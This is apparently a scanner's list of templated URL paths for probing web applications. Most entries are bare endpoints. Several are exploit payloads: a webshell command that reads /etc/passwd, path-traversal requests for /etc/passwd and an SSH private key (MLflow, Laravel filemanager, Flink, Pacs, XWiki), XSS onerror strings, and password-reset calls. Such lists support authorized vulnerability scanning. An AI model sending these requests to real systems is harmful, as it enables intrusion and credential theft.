/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/meta
/api/snapshots
/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/api/sys/set_passwd
/service/~baseapp/UploadServlet
/upload.action
/path/to/upload
/fileman/php/upload.php
/upload
/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=
/flat/admin.php?p=uploader&action=mediamanager&deletefile={{randstr}}
/flat/admin.php?p=entry&action=delete&entry={{randstr}}
/flat/admin.php?p=plugin&action=default&disableantispam&_wpnonce={{randstr}}
/flat/admin.php?p=uploader&action=mediamanager&deletefile=gallery-{{randstr}}
/upload_file
/path/to/vulnerable/endpoint?param={{randstr}}
/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E
/Pacs/authenticate.php
/Pacs/encapsulatedDoc.php?file=../../../../etc/passwd
/Pacs/importWorklist.php
/Pacs/uploadImage.php
/Pacs/studyNotes.php?id=
/folder/{{randstr}}/catalog-libraries?c={{randstr}}
/c/portal/login?login={{randstr}}&password={{randstr}}
/api/register
/api/create-account
/register
/auth/login
/wp-json/wp-statistics/v2/hit?_={{randstr}}&_wpnonce={{wp_nonce}}&wp_statistics_hit_rest=&browser={{payload}}&platform=&version=&referred=&ip={{rand_ip}}&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp={{randstr}}&current_page_type=home&current_page_id=0&search_query=&page_uri=/&user_id=0
/path/to/vulnerable/upload
/stats/{{randstr_1025}}
/Security_Services/{{randstr_1025}}
/resources/{{randstr_1025}}
//{{randstr_1025}}
/xwiki/bin/view/Main/DeletedDocument?rev=deleted:{{randstr}}
/xwiki/bin/view/Main/?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%2F2.1&fromHTML=false&toHTML=true&text=%7B%7Boffice+reference%3D%22url%3Afile%3A%2F%2F%2Fetc%2Fpasswd%22%2F%7D%7D&formToken={{randstr}}
/./upload/1
/resolveContentRef
/unzip
/assets
/finder
/_next/data/{{randstr}}/page.json
/api/2.0/mlflow-artifacts/artifacts/C:../.ssh/id_rsa
/{{randstr}}
/docs/introduction.html
/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd
/ccm/system/panels/page/preview_as_user/preview?cID=
/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/lucee/lucees3ezf%3cimg%20src%3da%20onerror%3dalert(
/login.php/
/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
/cgi-bin/MANGA/index.cgi
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc
/contact/
/contact-us/
/submit/
/support/
/form/
/get-in-touch/
/wp-admin/admin-ajax.php
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt
/organization-setup
/{{route}}
